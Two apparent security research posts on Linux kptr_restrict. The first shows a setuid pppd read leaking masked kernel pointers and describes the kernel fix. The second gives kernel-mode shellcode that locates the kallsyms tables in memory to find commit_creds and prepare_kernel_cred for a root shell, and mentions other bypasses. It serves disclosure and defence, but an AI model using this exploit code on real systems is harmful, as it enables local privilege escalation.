kptr_restrict – privilege checks

In the Linux kernel, kptr_restrict is used to protect sensitive kernel pointer values by printing them as zeros when a kernel-provided file (for example under /sys or /proc) is read by a non-privileged user. This is implemented with a printf extension called “%pK”. Typically code prints to a /sys or /proc file using the seq_file interface. For example:

seq_printf(m, "secret pointer = %pK\n", secret_pointer);

When kptr_restrict is enabled and a file using this interface is read, a check is done to see whether the reading process has CAP_SYSLOG. If so, the real pointer value is printed; otherwise zeros are printed.

This deviates from the normal UNIX file privilege model, where file permissions are checked at open time, not read time. This becomes a problem when a setuid binary reads a file which uses %pK to protect sensitive pointers. Setuid binaries which need to open files will typically drop privileges to open the file. This ensures that only files which the real user has access to will be opened. Once the file is opened, the setuid binary can re-elevate its privileges.

Consider the code in pppd for parsing the options file in pppd/options.c:options_from_file():

euid = geteuid();
if (check_prot && seteuid(getuid()) == -1) {
    option_error("unable to drop privileges to open %s: %m", filename);
    return 0;
}
f = fopen(filename, "r");
err = errno;
if (check_prot && seteuid(euid) == -1)
    fatal("unable to regain privileges");

The effective user id is set to the real user id and then the options file is opened. Only a file readable by the real user can be opened here. Once the file has been successfully opened, the pppd binary immediately re-elevates privileges. Looking a few lines down in the code we see this:

while (getword(f, cmd, &newline, filename)) {
    opt = find_option(cmd);
    if (opt == NULL) {
        option_error("In file %s: unrecognized option '%s'",
                     filename, cmd);
        goto err;
    }
    /* ... */
}

The pppd option parser reads commands, and will print out an error if the command is not valid.

The problem is that %pK checks privileges when the file is read, not when it is opened. Most files which use %pK are world readable, so they will pass the open check in pppd. But when the read is done, pppd is running as root, so the %pK protection is not in effect. This means we can do the following:

$ head -1 /proc/kallsyms 
00000000 T startup_32 
$ pppd file /proc/kallsyms
pppd: In file /proc/kallsyms: unrecognized option 'c1000000'

Unfortunately pppd bails on the first error in the file, so we can’t get it to dump the full contents of /proc/kallsyms. It is useful for one-liner %pK files such as those in /sys/module//sections/* though. Most setuid applications avoid printing anything from opened files, pppd being the only one I could find in a stock Ubuntu 12.04 installation. If you get lucky though, you might find a less paranoid setuid binary which will happily write out the full contents of a file under the assumption that the real user must be able to read it anyway.

The quick and dirty fix to this issue is to check that, in addition to having CAP_SYSLOG, the real and effective uids and gids are equal before printing the real %pK values. That fix has been merged into mainline Linux here.
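
The combined check can be modelled in user space as a small predicate. This is only a sketch of the logic described above, not the kernel patch itself; the function name may_show_kernel_pointer and its parameters are hypothetical.

```c
#include <stdbool.h>
#include <sys/types.h>

/*
 * Hypothetical user-space model of the quick fix: the real pointer value is
 * shown only if the reader has CAP_SYSLOG *and* its real and effective
 * IDs match (which is not the case inside a setuid or setgid binary).
 */
static bool may_show_kernel_pointer(bool has_cap_syslog,
                                    uid_t ruid, uid_t euid,
                                    gid_t rgid, gid_t egid)
{
        if (!has_cap_syslog)
                return false;

        return ruid == euid && rgid == egid;
}
```

For pppd started by an ordinary user, the real uid is that user's and the effective uid is 0, so the predicate returns false even though root holds CAP_SYSLOG.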

The better long term fix is to do the privilege check at open time and store it as part of the seq_file structure. Rather than using a %pK, a function should be used which checks the stored privilege. For example:

seq_printf(m, "secret pointer = %p\n", 
           seq_secret_pointer(m, secret_pointer));

The seq_secret_pointer function should return NULL if the user which issued the open does not have CAP_SYSLOG. Unfortunately, fixing this is not entirely straightforward. Most users of %pK are using the seq_file interface, and can be easily converted. There are a handful of %pK uses in printk statements, which are basically just incorrect since no sane permission check can be done (nobody opens printk). There is already a protection mechanism for printk, called dmesg_restrict, so the printk uses can simply be changed to %p. The only problem is the module sections files (see above), which use the traditional-style sysfs show function rather than a seq_file (see kernel/module.c: module_sect_show()). Some thought needs to go into how to refactor that code in order to store the open-time privileges.
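
To make the open-time idea concrete, here is a user-space model of it. It is a sketch under stated assumptions, not kernel code: struct model_seq_file and model_seq_open are hypothetical stand-ins for the real seq_file structure and open path, and seq_secret_pointer is the proposed helper, which does not exist in the kernel.

```c
#include <stdbool.h>
#include <stddef.h>

/* Hypothetical stand-in for the kernel's struct seq_file. */
struct model_seq_file {
        bool opener_has_cap_syslog;     /* recorded once, at open time */
};

/* Record the opener's privilege when the file is opened. */
static void model_seq_open(struct model_seq_file *m, bool has_cap_syslog)
{
        m->opener_has_cap_syslog = has_cap_syslog;
}

/*
 * Return the pointer only if the opener was privileged. The privileges of
 * whoever later calls read() play no part in the decision.
 */
static const void *seq_secret_pointer(const struct model_seq_file *m,
                                      const void *ptr)
{
        return m->opener_has_cap_syslog ? ptr : NULL;
}
```

With this model, a setuid binary that drops privileges for the open and regains them before the read still gets NULL, because the decision was fixed at open time.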


kptr_restrict – Finding kernel symbols for shell code

A common approach to getting a root shell from an exploit which grants execution in the kernel is to jump to a user-controlled function which does the following:

commit_creds(prepare_kernel_cred(0));

These kernel functions will create a new credential structure with root privileges, and then commit that credential structure to the current process. After returning to user-space, a root shell can be spawned.

Before doing all this, the attacker needs to know the addresses of the kernel functions. Helpfully, the Linux kernel provides a user-readable file called /proc/kallsyms, which lists the addresses of the kernel's symbols. An unprivileged attacker can use this file to get the addresses of the kernel functions needed by the shell code. For example:

$ grep prepare_kernel_cred /proc/kallsyms | head -1
84056fec T prepare_kernel_cred

Being able to do this as an unprivileged user has more recently (at least by the mainline kernel) been viewed as undesirable, because it provides internal kernel information to attackers. As such, there was discussion around making /proc/kallsyms unreadable, which eventually resulted in a feature called kptr_restrict being added to the kernel.

kptr_restrict is a sysctl which makes pointer values printed with “%pK” appear as zero, unless you have CAP_SYSLOG. With it enabled, we get the following instead:

$ grep prepare_kernel_cred /proc/kallsyms | head -1
00000000 T prepare_kernel_cred

Which is much less useful to a would-be attacker. In the initial discussion about hiding /proc/kallsyms, a few people pointed out that most installations are distro kernels, and attackers can simply hard-code the addresses for the necessary functions. Indeed, this is what a number of PoC exploits now do, sometimes with a small table for targeting a few different kernels. This works, but significantly reduces the number of machines that the exploit will work against.

I wanted to try and find a generic, portable method for finding the kernel symbols even with kptr_restrict enabled. For this example, I am assuming that an attacker has already gained kernel mode code execution, and needs a reliable way to find the addresses of the necessary kernel functions for creating the shell code. Note that once you have code execution, you have really already won, and kptr_restrict and many other protections will cease to be fully effective. kptr_restrict is still effective against other forms of attack, such as arbitrary writes. The method I’m presenting here is just one possible way to get the kallsyms addresses once executing in kernel mode.

I started by looking at what information can be gathered about the kallsyms. Although kptr_restrict hides the most useful information, the symbol addresses, an unprivileged user can still read the file and collect some information about the symbols, including:

  • The names of the symbols
  • The number of symbols
  • The order that they appear in the kernel’s kallsyms table

The first thing to note is that the kallsyms table is large. There are around seventy thousand built-in symbols on my desktop machine. Since we know the order and names of the symbols, we can probably search for a matching table in the kernel’s memory. The sheer size and uniqueness of the table makes it virtually certain that a match will be what we are looking for. So let’s look at how the kernel stores the table. From kernel/kallsyms.c:

extern const unsigned long kallsyms_addresses[] __attribute__((weak));
extern const u8 kallsyms_names[] __attribute__((weak));

The __attribute__((weak)) part is a gcc directive which marks the symbols as weak, meaning that any other definition of these symbols will supersede these ones. This doesn’t matter for our purposes, since either way, the arrays will be in the data section. Looking through the code in kernel/kallsyms.c we can see that kallsyms_addresses is an ordinary array, but kallsyms_names is a compressed string table. We also note that the arrays in kernel/kallsyms.c only store the built-in symbols; module symbols are stored elsewhere.
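
To give a feel for what “compressed string table” means, here is a user-space sketch of how one entry is expanded, assuming the layout used by kernels of that era: each entry is a length byte followed by that many token indexes, and each index selects a string from a token table (kallsyms_token_table and kallsyms_token_index in the kernel). The function expand_symbol and the toy_* tables are made up for illustration; real tables are generated by scripts/kallsyms.

```c
#include <stddef.h>
#include <stdint.h>

/*
 * Expand the entry at offset `off` of a kallsyms-style name table.
 * The first expanded character is the symbol type (e.g. 'T'); it is stored
 * in *type and the remaining characters go to `name`.
 * Returns the offset of the next entry.
 */
static size_t expand_symbol(const uint8_t *names, size_t off,
                            const char *token_table,
                            const uint16_t *token_index,
                            char *type, char *name, size_t name_size)
{
        size_t len = names[off];                /* number of token indexes */
        const uint8_t *data = &names[off + 1];
        size_t out = 0;
        int seen_type = 0;

        for (size_t i = 0; i < len; i++) {
                const char *tok = &token_table[token_index[data[i]]];

                for (; *tok; tok++) {
                        if (!seen_type) {
                                *type = *tok;
                                seen_type = 1;
                        } else if (out + 1 < name_size) {
                                name[out++] = *tok;
                        }
                }
        }
        if (name_size > 0)
                name[out] = '\0';

        return off + len + 1;
}

/* Toy tables: tokens "Tstart", "up_", "32" and "Tprep", stored back to back. */
static const char toy_tokens[] = "Tstart\0up_\0" "32\0Tprep";
static const uint16_t toy_index[] = { 0, 7, 11, 14 };
/* Two entries: {Tstart, up_, 32} and {Tprep}. */
static const uint8_t toy_names[] = { 3, 0, 1, 2, 1, 3 };
```

Expanding the entry at offset 0 of toy_names yields type 'T' and the name startup_32, and returns 4, the offset of the second entry.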

Before attempting to match the kallsyms name table, we first need to create a compressed version. Fortunately there is some code already provided for this in scripts/kallsyms.c. Usually scripts/kallsyms runs during the Linux kernel build and takes the file as an input and generates an assembler file as its output. Looking at the file we see that it has the same format as /proc/kallsyms, so we can reuse scripts/kallsyms.c with only a few small modifications:

  • We don’t want to sort the symbols in the input file, since /proc/kallsyms is already sorted.
  • We want to skip module symbols from /proc/kallsyms. These can be identified by having “[module_name]” at the end of the string.
  • We want to create an in memory copy of the name table, rather than writing it to a file.
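
The module-symbol filter from the list above could look roughly like this. It is a minimal sketch, not the actual modification made to scripts/kallsyms.c; the function name parse_builtin_symbol is hypothetical.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/*
 * Parse one /proc/kallsyms line of the form
 *     <hex address> <type> <name>[<tab>[module_name]]
 * Returns true for a built-in symbol, with *type and name filled in.
 * Returns false for module symbols and for lines that do not parse; the
 * outputs should be ignored in that case.
 */
static bool parse_builtin_symbol(const char *line, char *type,
                                 char *name, size_t name_size)
{
        unsigned long long addr;
        char sym[256], module[64];

        /* A fourth field means the line carries a "[module_name]" suffix. */
        if (sscanf(line, "%llx %c %255s %63s", &addr, type, sym, module) != 3)
                return false;
        if (strlen(sym) >= name_size)
                return false;

        strcpy(name, sym);
        return true;
}
```

Feeding every line of /proc/kallsyms through this filter, in file order, gives the list of built-in names and types that the compression step needs.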

By doing that we can create an exact copy of the kallsyms_names array in user-space. The next step is to find it once we are executing in kernel mode. The kallsyms_names array is in the data section, which is at the base of the kernel’s memory. Before searching for it, we need to find out where the kernel actually resides, since its location depends on the architecture and the VM split. We can determine the address of the kernel by attempting to mmap addresses where the kernel might be, starting with low addresses and working our way up. If an mmap call fails, then chances are that the kernel resides there:

static unsigned long *kernel_base;

static void find_kernel_base(void)
{
        unsigned long addrs[] = {
#ifdef X64
                /* ... (candidate base addresses not shown) ... */
#endif
        };
        void *map;
        int i;

        for (i = 0; i < ARRAY_SIZE(addrs); i++) {
                map = mmap((void *)addrs[i], 0x1000, PROT_NONE,
                           MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0);
                if (map == MAP_FAILED) {
                        /* User-space can't map here, so the kernel probably lives here */
                        kernel_base = (unsigned long *)addrs[i];
                        printf("Guess kernel base @ %p\n", kernel_base);
                        return;
                }
                munmap((void *)addrs[i], 0x1000);
        }

        printf("Can't guess kernel base\n");
}

The kallsyms_names array resides in the kernel’s data section, which is at the base of its memory. We don’t know the exact location, but that doesn’t matter because the kernel’s low memory is always contiguously mapped. We should be able to scan about 16MB from the kernel’s base on most architectures without problem.

When trying to match the table, we first do a partial match to speed things up. Here is the first part of our shell code which runs in kernel space:

#define KERNEL_LOWMEM_SIZE (16 * 1024 * 1024)

static unsigned long *kallsyms_find_name_table(void)
{
        unsigned long *addr;

        for (addr = kernel_base;
             addr + kallsyms_names_size < kernel_base + KERNEL_LOWMEM_SIZE;
             addr++) {
                /* Cheap partial match first, to reject most addresses quickly */
                if (memcmp(addr, kallsyms_names, PARTIAL_MATCH_SIZE) != 0)
                        continue;

                /* Then confirm with a full comparison */
                if (memcmp(addr, kallsyms_names, kallsyms_names_size) != 0)
                        continue;

                return addr;
        }

        /* Couldn't find it */
        return NULL;
}

We now know the location of the kallsyms_names array in the kernel (and have verified that our view of it from user-space is consistent with the kernel’s view). From here we need to find the kallsyms_addresses table. In the kernel/kallsyms.c code the kallsyms_addresses array is declared immediately before the kallsyms_names array, so it should be just before it in the data section. Note that while the compiler could re-arrange these arrays, there is probably little reason for it to do so. It does, however, re-align the kallsyms_addresses array (probably for cache performance), and may move some other variables between the two arrays (notably kallsyms_num_syms). We know how many symbols there are (stored in the table_cnt variable in the scripts/kallsyms.c code), that the symbols are in order, and that all of the symbol addresses will be in the low part of the kernel’s memory. This allows us to scan backwards from the beginning of the kallsyms_names table to find the kallsyms_addresses table. We first subtract table_cnt from the kallsyms_names location, and then continue going backwards while we have a valid-looking kernel pointer which is less than or equal to the one above it:

static bool is_kernel_pointer(unsigned long value) {
        return
#ifdef X64
                /*
                 * Ubuntu 64-bit lists a bunch of data items with low
                 * addresses in /proc/kallsyms.
                 */
                (value >= 0x0 && value <= 0x20000) ||
#endif
                (value >= (unsigned long)kernel_base &&
                 value <= (unsigned long)kernel_base + KERNEL_LOWMEM_SIZE);
}

static unsigned long *kallsyms_find_addr_table(unsigned long *names_base)
{
        unsigned long *addr, prev_ptr = ~0;

        for (addr = names_base - table_cnt; addr >= kernel_base; addr--) {
                /* Stop at the first value that breaks the sorted run of kernel pointers */
                if (!is_kernel_pointer(*addr) || *addr > prev_ptr)
                        break;

                prev_ptr = *addr;
        }

        if (addr == kernel_base) {
                /* Whoops */
                return NULL;
        }

        return addr;
}

We now have the location of the kallsyms_addresses array. The next step is for our shell code to get the addresses of the functions it needs. The easiest way to do this is to prepare the array indexes of the functions before we enter kernel-space. We can get these from /proc/kallsyms, allowing our shell code to then do:

prepare_kernel_cred = (void *)ksyms[idx_prepare_kernel_cred];
commit_creds = (void *)ksyms[idx_commit_creds];
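
The index lookup itself can be done entirely in user space before entering the kernel. The following is a sketch, assuming that the position of a built-in symbol in /proc/kallsyms matches its position in kallsyms_addresses as described above; the function name find_symbol_index is hypothetical.

```c
#include <stdio.h>
#include <string.h>

/*
 * Return the zero-based index of `wanted` among the built-in symbols in a
 * /proc/kallsyms-style stream, or -1 if it is not present. Module symbols
 * (lines with a trailing "[module_name]" field) are not counted.
 */
static long find_symbol_index(FILE *f, const char *wanted)
{
        char line[512], name[256], module[64], type;
        unsigned long long addr;
        long idx = 0;

        while (fgets(line, sizeof(line), f) != NULL) {
                int n = sscanf(line, "%llx %c %255s %63s",
                               &addr, &type, name, module);

                if (n != 3)
                        continue;       /* module symbol or malformed line */
                if (strcmp(name, wanted) == 0)
                        return idx;
                idx++;
        }

        return -1;
}
```

Calling it once per function on a freshly opened /proc/kallsyms (for example with "prepare_kernel_cred" and "commit_creds") would give the values for idx_prepare_kernel_cred and idx_commit_creds. The masked addresses do not matter here, since only the order of the lines is used.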


Return to user-space, spawn a shell, and now we are root. I’ve tested this approach using the same code on 64-bit and 32-bit versions of Ubuntu 12.04, and on Linux 3.7 running on an ARM Realview PB-A8. In each case the shell code is able to find the kallsyms_addresses array and subsequently get root.

There are also some other interesting approaches to finding the kernel symbols. Spender’s enlightenment framework looks for a unique string in the kernel/kallsyms.c text, and then uses that as a starting point for finding the function kallsyms_lookup_name(), which the shell code can then use to find the address of any symbol while running in kernel space. Another approach is to scan kernel memory for the “%pK %c %s” string that is used to print /proc/kallsyms and replace the “K” with a space, disabling the kptr_restrict protection for the string.